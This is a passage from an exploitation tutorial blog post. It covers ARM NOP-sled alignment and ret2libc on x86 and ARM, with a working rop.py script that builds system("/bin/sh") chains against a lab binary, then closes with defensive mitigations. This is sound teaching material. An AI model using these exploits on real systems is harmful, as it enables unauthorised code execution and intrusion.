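print(overwrites_return(spray, 106, TARGET))  # a hypothetical unaligned offset
```

If the measured offset had not been a multiple of 4, the spray would need one to three bytes of leading padding to bring the copies back into alignment.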

ARM NOP sled alignment complications

ARM NOP sleds must be handled a bit differently due to:

4-byte alignment requirement: ARM instructions must be 4-byte aligned in ARM mode
Multi-byte NOP instructions: No single-byte NOP exists
Address alignment: The environment variable address must also be 4-byte aligned (divisible by 4)

Using nop.py for ARM:

Use nop.py to generate an appropriate ARM NOP sled using the --arch arm flag and store it in an env variable:

export SHELLCODE=$(./nop.py shellcode -a arm 1000)

This generates 1000 bytes of ARM NOP instructions (mov r1, r1 - encoded as \x01\x10\xa0\xe1) followed by the ARM shellcode. Note that the NOP sled size should be divisible by 4 since each ARM NOP is 4 bytes.

Critical alignment issue: The environment variable address must be 4-byte aligned (divisible by 4). Use getenv_addr to check:

./getenv_addr SHELLCODE
# Output: 0xbefffd3a (example - NOT divisible by 4)

If the address is NOT divisible by 4, export additional environment variables to shift addresses:

export DUMMY="AA"
./getenv_addr SHELLCODE
# Output: 0xbefffd3c (NOW divisible by 4!)

This manipulation shifts environment variable addresses until alignment is achieved. Only then can we successfully exploit ARM targets with NOP sleds.
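Checking alignment is just a modulo operation. The sketch below runs it on the two example addresses shown above; misalignment is a hypothetical helper for illustration.

```python
def misalignment(addr, width=4):
    """Number of bytes addr sits past the previous width-byte boundary."""
    return addr % width


for addr in (0xBEFFFD3A, 0xBEFFFD3C):
    off = misalignment(addr)
    status = "aligned" if off == 0 else f"off by {off}"
    print(f"{addr:#010x}: {status}")
```

In practice it is enough to look at the last hex digit: an address is 4-byte aligned when that digit is 0, 4, 8, or c.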

Once aligned, exploit as before:

./victim $(./nop.py buffer SHELLCODE ./victim 240)

Note that the environment variable addresses inside victim will differ from those seen by your shell. If you run into bus errors or segmentation faults, try adding more A's to your DUMMY environment variable and retrying. It'll work after a few retries - trust me!

Return-Oriented Programming (ROP)

NOP sleds require an executable stack (the -z execstack flag we passed to gcc). Modern systems enable the NX (No-eXecute) bit by default, marking the stack as non-executable. When we attempt to execute shellcode from the stack, the program crashes with a segmentation fault.

Return-Oriented Programming (ROP) bypasses this protection by reusing existing executable code in the program and linked libraries. Instead of injecting new code, we chain together short instruction sequences (called gadgets) ending in ret instructions, controlling the sequence via stack manipulation.

ROP fundamentals

The basic idea:

Overwrite saved return addresses with an address of a gadget in executable memory (like libc)
The gadget then executes and returns (via ret) to the next address on the stack
We control the stack, so we control the sequence of gadgets executed
Chain gadgets to achieve desired behavior (e.g., calling system("/bin/sh"))

For Linux exploitation, this is often called ret2libc (return-to-libc) when specifically targeting libc functions.

ret2libc on x86

Instead of executing shellcode, we call system("/bin/sh") from libc. The system() function executes shell commands, so passing "/bin/sh" spawns a shell.

Required elements:

Address of system() in libc
Address of exit() in libc (for clean exit after shell exits)
Address of string "/bin/sh" (can be in an environment variable, but it also conveniently exists in libc itself)

Stack layout for ret2libc:

[padding to overflow]
[address of system()]
[address of exit()]
[address of "/bin/sh" string]

When the vulnerable function returns:

Pops system() address into EIP, begins executing system()
system() reads its return address (sees exit()) and argument (sees "/bin/sh")
system("/bin/sh") executes, spawning a shell
When shell exits, execution continues to exit(), cleanly terminating
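The sequence above can be traced on paper, or in a few lines of Python. The sketch below packs a three-word chain using placeholder addresses (real values come from GDB on your own system) and shows what the CPU and system() each see after the ret.

```python
import struct

# Placeholder addresses for illustration only
SYSTEM = 0xB7DE2920
EXIT = 0xB7DD1D60
BINSH = 0xB7E12345

chain = struct.pack("<III", SYSTEM, EXIT, BINSH)

# ret pops the first word into EIP, leaving ESP pointing at the second word.
eip = struct.unpack_from("<I", chain, 0)[0]
stack_after_ret = chain[4:]

# A cdecl function entered this way finds its return address at [esp]
# and its first argument at [esp + 4].
return_address, first_arg = struct.unpack_from("<II", stack_after_ret, 0)

print(f"eip            = {eip:#x}")
print(f"return address = {return_address:#x}")
print(f"first argument = {first_arg:#x}")
```

This is why exit() sits between system() and the string pointer: from system()'s point of view, that slot is simply where its caller's return address lives.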

Finding addresses manually with GDB:

gcc -m32 -fno-stack-protector -mpreferred-stack-boundary=2 victim.c -o victim
gdb ./victim
(gdb) break main
(gdb) run
(gdb) print system
# $1 = {<text variable, no debug info>} 0xb7de2920 <system>
(gdb) print exit
# $2 = {<text variable, no debug info>} 0xb7dd1d60 <exit>
(gdb) quit

For the "/bin/sh" string, we can find it directly in libc rather than using an environment variable:

# Find libc path
ldd ./victim | grep libc
# libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7d96000)

# Search for "/bin/sh" string in libc
grep -boa "/bin/sh" /lib/i386-linux-gnu/libc.so.6
# 1234567:/bin/sh

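The string offset plus the libc base address gives us the runtime address. (This treats the file offset reported by grep as the offset within the mapped library, which holds for typical libc builds but is worth confirming in GDB, e.g. with x/s on the computed address.)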
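The same lookup can be done without grep. The sketch below searches a file for the string and adds the offset to a load base; find_string_offset and runtime_address are hypothetical helpers, and the numbers in the usage line are the placeholder values from the example output above.

```python
def find_string_offset(path, needle=b"/bin/sh\x00"):
    """Return the file offset of the first occurrence of needle in path."""
    with open(path, "rb") as f:
        offset = f.read().find(needle)
    if offset < 0:
        raise ValueError(f"{needle!r} not found in {path}")
    return offset


def runtime_address(libc_base, offset):
    """Runtime address = load base reported by ldd + offset within libc."""
    return libc_base + offset


# Placeholder base and offset taken from the example output above
print(hex(runtime_address(0xB7D96000, 1234567)))
```

On a real system you would call find_string_offset() with the libc path printed by ldd and pass its result to runtime_address().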

Creating a manual exploit:

#!/usr/bin/env python3
import struct
import subprocess

# Addresses from GDB
system_addr = 0xb7de2920
exit_addr = 0xb7dd1d60
binsh_addr = 0xb7e12345  # libc base + "/bin/sh" offset

# Build payload
padding = b"A" * 112  # Padding to reach return address
rop_chain = struct.pack("<I", system_addr)
rop_chain += struct.pack("<I", exit_addr)
rop_chain += struct.pack("<I", binsh_addr)

payload = padding + rop_chain

subprocess.call(["./victim", payload])
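
One practical caveat when the payload travels through argv: command-line arguments are NUL-terminated C strings, so an address containing a 0x00 byte cannot be delivered this way. The following is a small sketch of a pre-flight check; the helper name words_with_nul is hypothetical and the addresses are the sample values from the script above.

```python
import struct


def words_with_nul(addresses):
    """Return the addresses whose 32-bit little-endian encoding contains 0x00."""
    return [a for a in addresses if b"\x00" in struct.pack("<I", a)]


# Sample addresses from the manual exploit above.
chain = {"system": 0xB7DE2920, "exit": 0xB7DD1D60, "binsh": 0xB7E12345}
bad = words_with_nul(chain.values())
if bad:
    print("problem addresses:", [hex(a) for a in bad])
else:
    print("chain is NUL-free")
```

If an address does contain a NUL byte, a different delivery path (for example stdin or a file, if the target reads one) or a different target address is needed.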

Automating ret2libc with rop.py

Manually finding all these addresses is tedious. Instead, let's create a script that automates the entire process:

rop.py

#!/usr/bin/env python3
import argparse
import re
from subprocess import call, check_output


def to_le32(val):
    """Convert integer to 4-byte little-endian."""
    return val.to_bytes(4, "little")


def get_libc_info(target):
    """Get libc path and runtime base address."""
    # Find libc path
    ldd = check_output(["ldd", target]).decode()
    libc_path = re.search(r"libc\.so\.6 => (\S+)", ldd).group(1)

    # Get symbol offsets from libc
    nm = check_output(["nm", "-D", libc_path]).decode()
    system_off = int(re.search(r"([0-9a-f]+) . system\b", nm).group(1), 16)
    exit_off = int(re.search(r"([0-9a-f]+) . \bexit\b", nm).group(1), 16)

    # Get runtime address via GDB to calculate base
    gdb = check_output(
        ["gdb", target, "-batch", "-ex", "b main", "-ex", "r", "-ex", "p system"]
    ).decode()
    system_addr = int(re.findall(r"0x([0-9a-fA-F]+)", gdb)[-1], 16)
    libc_base = system_addr - system_off

    # Find /bin/sh string offset
    binsh_off = int(check_output(["grep", "-boa", "/bin/sh", libc_path]).split(b":")[0])

    return {
        "path": libc_path,
        "base": libc_base,
        "system": libc_base + system_off,
        "exit": libc_base + exit_off,
        "binsh": libc_base + binsh_off,
    }


def build_x86_chain(libc):
    """
    x86 ret2libc: arguments on stack.
    Stack after overflow: [system][exit][&"/bin/sh"]
    """
    return to_le32(libc["system"]) + to_le32(libc["exit"]) + to_le32(libc["binsh"])

def build_arm_chain(target, libc):
    pass # Implemented later in the post

if __name__ == "__main__":
    p = argparse.ArgumentParser(description="ret2libc exploit for x86 and ARM")
    p.add_argument("target", help="Vulnerable binary")
    p.add_argument("-s", "--start", type=int, default=100, help="Min padding")
    p.add_argument("-e", "--end", type=int, default=130, help="Max padding")
    p.add_argument("-a", "--arch", choices=["x86", "arm"], required=True)
    args = p.parse_args()

    libc = get_libc_info(args.target)

    if args.arch == "arm":
        chain = build_arm_chain(args.target, libc)
    else:
        chain = build_x86_chain(libc)

    for padding in range(args.start, args.end):
        call([args.target, b"A" * padding + chain])

This script performs a handful of handy things:

Finds libc path: Uses ldd to locate the linked libc library
Extracts symbol offsets: Uses nm -D to get system() and exit() offsets from libc
Calculates runtime base: Runs GDB to get the actual system() address at runtime, then subtracts the offset to find the libc base address
Locates "/bin/sh": Uses grep -boa to find the string offset within libc
Builds the ROP chain: Constructs the payload with proper little-endian addresses
Bruteforces padding: Tries different buffer sizes to find the correct overflow offset
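
The offset extraction and base calculation can be tried in isolation on canned text. The sketch below is a slightly stricter variant of the regex approach in rop.py, not a replacement for it: parse_nm_offsets is a hypothetical helper, and the sample nm lines are made up so that they agree with the sample GDB and ldd output shown earlier.

```python
import re


def parse_nm_offsets(nm_output, wanted=("system", "exit")):
    """Map exact symbol names to their offsets, ignoring version suffixes."""
    offsets = {}
    for line in nm_output.splitlines():
        # Expected shape: "<hex offset> <type letter> <name>[@@VERSION]"
        m = re.match(r"^([0-9a-f]+)\s+\S\s+([^\s@]+)", line)
        if m and m.group(2) in wanted:
            offsets.setdefault(m.group(2), int(m.group(1), 16))
    return offsets


# Made-up nm -D lines, chosen to match the sample addresses in this post.
sample_nm = """\
0003bd60 T exit@@GLIBC_2.0
000c1a40 T _exit@@GLIBC_2.0
0004c920 W system@@GLIBC_2.0
         U __tls_get_addr@GLIBC_2.3
"""

offsets = parse_nm_offsets(sample_nm)
runtime_system = 0xB7DE2920  # sample value from the GDB session
libc_base = runtime_system - offsets["system"]
print(hex(libc_base), hex(libc_base + offsets["exit"]))
```

Matching on the exact name avoids accidentally picking up symbols such as _exit, which is the kind of mistake that is hard to spot once the addresses are packed into a payload.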

Using rop.py for x86:

First compile the target without the executable stack flag:

gcc -m32 -fno-stack-protector -mpreferred-stack-boundary=2 victim.c -o victim

Then run the exploit:

./rop.py ./victim -a x86 -s 100 -e 130

The script will try padding lengths from 100 to 129 bytes (the end value is exclusive). When it hits the correct offset, you'll get a shell without ever executing code from the stack! Bruteforcing the offset like this is not really practical for real hacking, but it is definitely a time saver!

ret2libc on ARM

ARM ret2libc is significantly more complex because the first four arguments are passed in registers (r0 through r3), not on the stack as on x86.

We can't simply overflow with function addresses and arguments. We need ROP gadgets that:

Pop values from the stack into registers
Then jump to our target function

The POP instruction as a gadget:

At first glance, POP seems uninteresting. But consider what pop {r0, r4, pc} actually does:

ldr r0, [sp], #4   ; load from stack into r0, increment sp
ldr r4, [sp], #4   ; load from stack into r4, increment sp
ldr pc, [sp], #4   ; load from stack into pc, increment sp

This loads values from the stack into registers - exactly what we need! If we overflow the stack with:

Gadget address	r0	r4	pc
`pop {r0, r4, pc}`	"/bin/sh"	dummy	system()

The gadget will pop our controlled values into registers, with r0 containing our argument and pc jumping to system().
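
Here is a minimal Python model of that behavior, just to show which stack word ends up in which register. The name simulate_pop is hypothetical and the two addresses are invented placeholders, not values from a real libc.

```python
import struct


def simulate_pop(reglist, stack_bytes):
    """Load one little-endian word per register, lowest address first."""
    regs, sp = {}, 0
    for reg in reglist:
        (regs[reg],) = struct.unpack_from("<I", stack_bytes, sp)
        sp += 4  # post-increment, as in ldr rX, [sp], #4
    regs["sp_advance"] = sp
    return regs


# Hypothetical runtime addresses, for illustration only.
BINSH, SYSTEM = 0xB6F2A1C4, 0xB6E5B3F1

# These are the words that follow the gadget address in the overflow.
stack = struct.pack("<III", BINSH, 0x41414141, SYSTEM)
state = simulate_pop(["r0", "r4", "pc"], stack)
for reg in ("r0", "r4", "pc"):
    print(f"{reg} = {state[reg]:#010x}")
```

Note that the gadget address itself is not part of the simulated stack: it was already consumed when the vulnerable function returned into the gadget.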

Finding gadgets in libc:

We need a gadget containing both r0 (first argument) and pc (jump target), without sp (which would corrupt our stack):

# Dump libc and search for useful POP patterns
objdump -d /lib/arm-linux-gnueabihf/libc.so.6 | grep "pop.*r0"

Or use tools like ROPgadget:

ROPgadget --binary /lib/arm-linux-gnueabihf/libc.so.6 | grep "pop {r0"
# Example output: 0x00018084 : pop {r0, r4, pc}

Thumb mode considerations:

As mentioned before, ARM processors can operate in ARM mode (fixed 32-bit instructions) or Thumb mode (16-bit instructions, mixed with 32-bit ones under Thumb-2). When branching to Thumb code, the least significant bit (LSB) of the target address must be set to 1. The updated rop.py below sets this bit automatically for the system() and exit() addresses. Keep in mind that the same rule applies to the gadget address itself if the gadget lives in Thumb code.
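
The bit manipulation itself is tiny. As a sketch, with hypothetical helper names and an invented address, this is how the LSB is set and how an interworking branch interprets it:

```python
def with_thumb_bit(addr):
    """Mark a code address as a Thumb target by setting bit 0."""
    return addr | 1


def decode_branch_target(addr):
    """Return (pc, state) the way an interworking branch interprets addr."""
    state = "thumb" if addr & 1 else "arm"
    return addr & ~1 & 0xFFFFFFFF, state  # bit 0 selects the state, not the pc


# Invented address, for illustration only.
target = with_thumb_bit(0xB6E5B3F0)
print(hex(target), decode_branch_target(target))
```

The bit only selects the instruction set; the processor clears it before fetching, so the code still starts at the even address.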

Extending rop.py for ARM:

The full rop.py script includes ARM support with automatic gadget finding:

def find_arm_gadget(libc_path, libc_base):
    """Find 'pop {r0, ..., pc}' gadget in libc."""
    objdump = check_output(["objdump", "-d", libc_path]).decode()

    candidates = []
    for m in re.finditer(r"^\s*([0-9a-f]+):.*pop\s*\{([^}]+)\}", objdump, re.M):
        offset, regs = m.groups()
        regs = [r.strip() for r in regs.split(",")]

        # Need r0 and pc, must not have sp (corrupts stack)
        if "r0" in regs and "pc" in regs and "sp" not in regs:
            candidates.append((int(offset, 16), regs))

    if not candidates:
        raise RuntimeError("No suitable ARM gadget found")

    # Prefer smallest gadget (fewer dummy values needed)
    candidates.sort(key=lambda x: len(x[1]))
    offset, regs = candidates[0]

    return libc_base + offset, regs


def build_arm_chain(target, libc):
    """
    ARM ret2libc: arguments in registers via ROP gadget.
    Chain: [gadget][values to pop into registers...]
    """
    gadget_addr, regs = find_arm_gadget(libc["path"], libc["base"])

    chain = to_le32(gadget_addr)
    for reg in regs:
        if reg == "r0":
            chain += to_le32(libc["binsh"])
        elif reg == "pc":
            chain += to_le32(libc["system"] | 1)  # Thumb bit
        elif reg == "lr":
            chain += to_le32(libc["exit"] | 1)  # Thumb bit
        else:
            chain += b"\x41\x41\x41\x41"  # Dummy for other regs

    return chain

The find_arm_gadget() function:

Disassembles libc using objdump
Searches for all pop {...} instructions
Filters for gadgets containing r0 and pc but not sp
Selects the smallest gadget (minimizes dummy values needed)
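
To see the filter in action without a real libc, the same selection logic can be run against a few lines of canned disassembly. This is a sketch: pick_gadget is a hypothetical standalone version of the filtering step, and the sample lines are hand-written in objdump's style rather than copied from an actual library.

```python
import re

POP_RE = re.compile(r"^\s*([0-9a-f]+):.*pop\s*\{([^}]+)\}", re.M)


def pick_gadget(disassembly):
    """Return (offset, regs) for the shortest pop with r0 and pc but no sp."""
    candidates = []
    for m in POP_RE.finditer(disassembly):
        regs = [r.strip() for r in m.group(2).split(",")]
        if "r0" in regs and "pc" in regs and "sp" not in regs:
            candidates.append((int(m.group(1), 16), regs))
    if not candidates:
        return None
    return min(candidates, key=lambda c: len(c[1]))


# Hand-written sample in objdump's layout (offsets are invented).
sample_disassembly = """\
   18084:  bd11       pop  {r0, r4, pc}
   1a2f0:  e8bd 81f0  ldmia.w  sp!, {r4, r5, r6, r7, r8, pc}
   2b10c:  bdf0       pop  {r4, r5, r6, r7, pc}
   3c44e:  bd1f       pop  {r0, r1, r2, r3, r4, pc}
"""

print(pick_gadget(sample_disassembly))
```

Only the first and last lines pass the filter, and the three-register gadget wins because it needs just one dummy word.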

The build_arm_chain() function:

Finds a suitable gadget
Builds the chain by iterating through the registers in the gadget
Places appropriate values for each register (/bin/sh for r0, system() for pc)
Sets the LSB for Thumb mode addresses
Fills unused registers with dummy values

Using rop.py for ARM:

gcc -fno-stack-protector victim.c -o victim
./rop.py ./victim -a arm -s 100 -e 130

When executed:

Overflow overwrites return address with gadget address
Function returns to gadget
Gadget pops /bin/sh address into r0, dummy values into other registers, system() address into pc
Execution jumps to system() with r0 = "/bin/sh"
Shell spawns!

ARM ROP is a bit of a pain in the ass due to its register-based calling convention, but at least we now have some basic automation for it.

Defensive perspective

You now understand how to exploit binaries, at least at a basic level. Modern exploitation typically uses ROP or variants (JOP, SROP) because executable stacks are rare in production systems. However, understanding NOP sleds is pedagogically valuable and still relevant for embedded systems or legacy software.

Understanding exploitation techniques also tells you a lot about how to defend against such attacks. For example, you now know about:

Bounds checking: Always use bounded string functions (strncpy, fgets, snprintf), keeping in mind that strncpy does not null-terminate the destination when the source is too long
Stack canaries: Modern compilers insert random values before return addresses; corruption is then detected before return
DEP/NX bit: Marks the stack and heap as non-executable
ASLR: Randomizes memory layout to make addresses unpredictable
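
As a quick way to check one of these from the defender's side, the sketch below parses the program headers printed by readelf -lW and reports whether the GNU_STACK segment is marked executable. The helper names are hypothetical, the sample header lines are hand-written in readelf's layout, and the parsing assumes the usual column order (type, offset, addresses, sizes, flags, alignment).

```python
from subprocess import check_output


def stack_is_executable(readelf_output):
    """Return True/False from the GNU_STACK flags, or None if it is absent."""
    for line in readelf_output.splitlines():
        parts = line.split()
        if parts and parts[0] == "GNU_STACK":
            # Flags sit between the six numeric columns and the alignment.
            flags = "".join(parts[6:-1])
            return "E" in flags
    return None  # no GNU_STACK header, so the platform default applies


def check_binary(path):
    """Run readelf on a real binary (assumes binutils is installed)."""
    out = check_output(["readelf", "-lW", path]).decode()
    return stack_is_executable(out)


# Hand-written sample lines in readelf's layout.
nx_stack = "  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x10"
exec_stack = "  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x10"
print(stack_is_executable(nx_stack), stack_is_executable(exec_stack))
```

Running check_binary() on the victim builds from this post should show the difference between the NOP sled target and the ret2libc target, assuming the former was linked with an executable stack.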

Additionally, some other things we haven't explicitly covered are:

CFI (Control Flow Integrity): Ensures program control flow matches intended behavior
Static analysis: Tools like clang-tidy, cppcheck detect unsafe function usage
Fuzzing: Automated testing with malformed inputs to discover vulnerabilities

Although we haven't seen many of these ourselves, you'll find a ton of literature on these topics if you look them up.

Keep in mind though, no single mitigation is perfect. Hackers are surprisingly crafty and sometimes heavily funded and well-equipped (think nation states). Defense in depth (multiple layers) is always critical.

If you want to learn more about security and the fundamental principles, I would highly recommend Computer Security and the Internet: Tools and Jewels by Paul C. van Oorschot.

Next steps

If you made it to the end of this post, congrats! We covered a lot of ground: we explored shellcode development and two exploitation techniques (NOP sleds and ROP) for both x86 and ARM, and we even developed some swanky Python scripts to automate parts of the process. In Part 4, we'll shift focus to heap-based vulnerabilities on ARM (and only ARM, because x86 is meh). Onwards!

References

The Shellcoder's Handbook - Chris Anley, John Heasman, Felix Lindner, Gerardo Richarte
Hacking: The Art of Exploitation (2nd Edition) - Jon Erickson
Linux Syscall Reference
X86 Assembly/Interfacing with Linux - Wikibooks
Intel 64 and IA-32 Architectures Software Developer's Manual
Azeria Labs: ARM Assembly Basics
Exploit Database: x86 execve shellcode
Exploit Database: ARM execve shellcode
A Short Guide on ARM Exploitation - Aditya Gupta
ARM shellcode and exploit development - Andrea Sindoni (BSides Munich 2018)
Python ctypes documentation
Computer Security and the Internet: Tools and Jewels - Paul C. van Oorschot